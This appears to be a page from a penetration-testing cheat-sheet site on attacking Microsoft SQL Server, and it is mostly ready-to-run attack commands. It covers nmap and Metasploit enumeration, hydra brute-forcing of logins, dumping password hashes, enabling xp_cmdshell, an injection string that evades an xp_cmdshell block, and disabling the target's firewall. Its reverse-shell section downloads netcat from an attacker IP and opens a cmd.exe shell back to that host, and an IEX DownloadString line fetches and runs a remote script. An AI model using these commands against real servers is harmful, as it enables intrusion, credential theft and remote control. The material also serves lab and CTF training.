CyberWolf-Security
  • Home
  • Getting Started in Cyber Security
  • Misc
    • Misc Items
      • Powershell commands
      • Reverse Shells
      • Web Shells
      • File Sharing
      • Useful Commands
      • Google Dorks
      • Proxy & Proxy Chains
      • Port Scanning
      • Intercept Linux CLI Traffic
      • Nessus
    • Frequency stuff
    • Random stuff - needs sorting
  • Services
    • Ports - Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 69 - TFTP
      • 79 - Finger
      • 88 - Kerberos
      • 123 - NTP
      • 137 - Netbios
      • 161 - SNMP
      • 363 - LDAP
      • 443 - HTTPS
        • IIS
      • 445 - SMB
      • 500 - IKE
      • 623 - IPMI
      • 873 - RSYNC
      • 1433 - MSSQL
      • 1521 - Oracle DB
      • 3389 - RDP
      • 3260 - iSCSI
      • 2049 - NFS
      • 5900 - VNC
      • 5985 - WinRM
      • 6000 - X11
      • 8080 - Jenkins
      • 11211 - Memcached
  • Password Cracking
    • Password attacks
    • Password Cracking
  • Tools
    • Tools
      • Crackmapexec
      • Metasploit
      • Bloodhound
      • Tcpdump
      • Logcat
  • Wireless testing
    • Wireless
      • Converting handshake to .hccapx for Hashcat
      • Cracking WPA/WPA2 hashes
      • Hacking Wireless
      • Get Wireless password from Windows CMD
      • Hotspot
  • Web Application
    • Web App
      • Directory Brute forcing
      • Subdomain brute forcing
      • JWT Tokens
      • GIT
      • Cross-Site Scripting (XSS)
        • Embedded images
        • Payloads
      • WPScan
      • Local File Inclusion (LFI)
      • SQLmap
      • Server Side Template Injection
      • SQL Injection
      • Using Hydra for web brute force
      • Remote Code Execution (RCE)
      • Uploads
      • Subdomain takeover
      • XLS/CSV Injection
      • XML Injection
  • Internals
    • Internals
      • Finding Domain Controllers and DHCP servers
      • Discovering hosts from the inside
      • Dumping domain hashes
      • Active Directory
      • Getting local hashes
      • service principle names (SPNs)
  • Mobile Application
    • Mob App
      • MobApp Testing VM
      • Jailbreaking IOS
      • Tools
        • Frida
        • MobSF
          • Installing MobSF
      • Mobile Application Testing
        • Android
          • Checklist and Methodology
          • ADB
        • IOS
          • Checklist and Methodology
  • Cloud
    • Microsoft Office 365 Security Review
      • Page 1
    • Kubernetes & Docker Review
  • Privilege escalation
    • Windows
      • Tools
      • Unquoted service paths
    • Service Execution
    • Linux
      • Tools
      • Perform a core dump
      • Useful commands
      • Spawn a TTY shell
  • CTF-stuff
    • .Git
  • Steganography
    • Tools
  • Labs / Resources
    • Mitre Caldera
    • Blue-Team
      • Labs
    • Red-Team
      • Vulnerable virtual machines
      • Vulnerable Sites
  • Training
    • Certifications
      • OSCP
      • CEH
      • Crest
        • Crest CPSA
        • Crest CRT
          • Syllabus
          • Appendix B: Core Technical Skills
            • B4 - Network Mapping & Target Identification
            • B5 - Interpreting Tool Output
            • B8 - OS Fingerprinting
            • B9 - Application Fingerprinting and Evaluating Unknown Services
            • B13 - File System Permissions
          • Appendix C: Background Information Gathering & Open Source
            • C2 - Domain Name Server (DNS)
          • Appendix D: Networking Equipment
            • D1 - Management Protocols
            • D3 - Networking Protocols
          • Appendix E: Microsoft Windows Security Assessment
            • E1 - Domain Reconnaissance
            • E2 - User Enumeration
            • E3 - Active Directory
            • E5 - Windows Vulnerabilities
            • E9 - Common Windows Applications
          • Appendix F: Unix Security Assessment
            • F1- User enumeration
            • F2 - Unix vulnerabilities
            • F3 - FTP
            • F4 - Sendmail / SMTP
            • F5 - Network File System (NFS)
            • F6 - R* services
            • F7 - X11
            • F8 - RPC services
            • F9 - SSH
          • Appendix G: Web Technologies
            • G1 - Web Server Operation
            • G2 - Web Servers & their Flaws
            • G4 - Web Protocols
            • G7 - Web Application Servers
          • Appendix I: Web Testing Techniques
            • I1 - Web Site Structure Discovery
            • I2 - Cross Site Scripting Attacks
            • I3 - SQL Injection
            • I6 - Parameter Manipulation
          • Appendix J: Databases
            • J1 - Microsoft SQL Server
            • J2 - Oracle RDBMS
            • J3 - Web / App / Database Connectivity
      • Study Material
        • Encryption
    • Terminology
      • NTLM & NTLM2
  • Vulnerabilities
    • Vulnerabilities
  • Exploits
    • ImageMagick
    • CVE-2021-3560 (PolKit)
  • Bug Bounty
    • Bug Bounty Programs
    • Sub Domain Finder
    • link dump
  • FAQ
    • Install ALFA AWUS1900 on Kali
    • Update and upgrade Linux
  • Build Review
    • Workstation
  • Hack the Box
    • Challenges
      • The Needle
Powered by GitBook
On this page
  • Enumeration
  • Enumerate SQL login accounts
  • Enumerate domain accounts
  • PowerUpSQL
  • Password attack
  • Extracting users
  • Dump hashes
  • CMD Shell
  • Enable xp_cmdshell - manual
  • Metasploit
  • Connecting to MSSQL
  • sqsh
  • metasploit
  • mssqclient
  • sqlcmd
  • crackmapexec
  • Using MSSQL-CLI Python utility
  • Common SQL Queries
  • Reverse shell
  • MSSQL 2017 Commands

Was this helpful?

  1. Services
  2. Ports - Services

1433 - MSSQL

MSSQL - Microsoft SQL service. typically runs on TCP port 1433 & Hidden mode port - 2433

Enumeration

//NMAP - enumerate the server, version and info
nmap [IP]
nmap --script ms-sql-info -p 1433 [IP]
nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 [IP]

//Metasploit - enumerate mssql info
use auxiliary/admin/mssql/mssql_enum
set RHOSTS [IP]
exploit

mssql_exec

The mssql_exec admin module takes advantage of the xp_cmdshell stored procedure to execute commands on the remote system. If you have acquired or guessed MSSQL admin credentials, this can be a very useful module.

msf auxiliary(mssql_exec) > set CMD netsh firewall set opmode disable

Enumerate SQL login accounts

// Metasploit - enumerate sql login accounts
use auxiliary/admin/mssql/mssql_enum_sql_logins
set RHOSTS [IP]
exploit

Enumerate domain accounts

//metasploit
use auxiliary/admin/mssql/mssql_enum_domain_accounts
set RHOSTS [IP]
exploit

PowerUpSQL

PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server

Example:

PS /opt/PowerUpSQL> Import-Module .\PowerUpSQL.psd1  
PS /opt/PowerUpSQL> Get-SQLInstanceDomain -Verbose 

ComputerName     : sql01.HTB.local
Instance         : sql01.HTB.local,1433
DomainAccountSid : 1500000521000221246588323062601712516458121134400
DomainAccount    : MSSQLSERVER$
DomainAccountCn  : MSSQLSERVER
Service          : MSSQLSvc
Spn              : MSSQLSvc/sql01.HTB.local
LastLogon        : 13/01/2021 02:56
Description      : 

PS /opt/PowerUpSQL> Get-SQLInstanceDomain | Get-SQLConnectionTest

ComputerName          Instance                   Status        
------------          --------                   ------        
sql01.HTB.local       sql01.HTB.local,1433       Accessible

Or load into memory

IEX(New-Object System.Net.WebClient).DownloadString("http://192.168.0.1/PowerUpSQL.ps1")

Password attack

nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passwd=/root/Desktop/wordlist/100-common-passwords.txt [IP]
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt [IP] mssql
hydra -l sa –P /root/Desktop/pass.txt [IP] mssql

##Metasploit:
use auxiliary/scanner/mssql/mssql_login
msf auxiliary(scanner/mssql/mssql_login) > set rhosts [IP]
msf auxiliary(scanner/mssql/mssql_login) > set user_file /root/Desktop/user.txt
msf auxiliary(scanner/mssql/mssql_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/mssql/mssql_login) > set stop_on_success true
msf auxiliary(scanner/mssql/mssql_login) > run

Extracting users

nmap -p 1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=Password123,ms-sql-query.query="SELECT * FROM master..syslogins" [IP] -oN output.txt

Dump hashes

nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=Password123 [IP]

CMD Shell

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=Password123,ms-sql-xp-cmdshell.cmd="ipconfig" [IP]

Enable xp_cmdshell - manual

//this enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

//Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'

//Bypass blackisted "EXEC xp_cmdshell"
‘; DECLARE @x AS VARCHAR(100)=’xp_cmdshell’; EXEC @x ‘ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net’ —impacket-mssqlclient machine_name/user@[IP] -windows-auth

Metasploit

// Suse auxiliary/admin/mssql/mssql_exec
set RHOSTS [IP]
set CMD whoami
exploit

Connecting to MSSQL

Connect using one of the following options:

sqsh

sqsh -S someserver -U sa -P password

metasploit

metasploit (mssql_login)

msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login

mssqclient

mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth

sqlcmd

sqlcmd. To use SQL Server Authentication, you must specify a user name and password by using the -U and -P options.

sqlcmd -S [IP] -U admin -P Password123
    1> select @@version
    2> go
sqlcmd -y0 -d ADSync -Q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"

crackmapexec

cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'

Using MSSQL-CLI Python utility

python3 -m mssqlcli.main -S [IP] -U sa -P Password123

Common SQL Queries

select @@version;
select loginname from syslogins where sysadmin = 1;
select name from sys.databases;
select * from sysusers;
select name, password_hash FROM master.sys.sql_logins;
SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured FROM sys.configurations WHERE name = 'xp_cmdshell';
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE
EXEC xp_cmdshell "whoami"
EXEC xp_cmdshell "dir C:\"
EXEC xp_cmdshell "type C:\file.txt"

Reverse shell

Download a netcat file to the remote server

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget
http://10.10.14.9/nc64.exe -outfile nc64.exe"

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe
10.10.14.9 443"

MSSQL 2003 commands

MSSQL 2017 Commands

Current user’s permissions:

SQL> SELECT * FROM fn_my_permissions(NULL, 'SERVER'); 
entity_name    subentity_name    permission_name 
------------   ---------------   ------------------ 
server                           CONNECT SQL 
server                           VIEW ANY DATABASE

Check out the databases available:

SQL> SELECT name FROM master.sys.databases 
name 
----------- 
master 
tempdb 
model 
msdb 
volume

I can look for user generated tables on those databases:

SQL> use volume 
[*] ENVCHANGE(DATABASE): Old Value: volume, New Value: volume 
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'. 
SQL> SELECT name FROM sysobjects WHERE xtype = 'U' 
name 
------------
Previous873 - RSYNCNext1521 - Oracle DB

Last updated 2 years ago

Was this helpful?

Link:

Impacket script

https://github.com/NetSPI/PowerUpSQL
mssqclient
MSSQL Injection Cheat Sheetpentestmonkey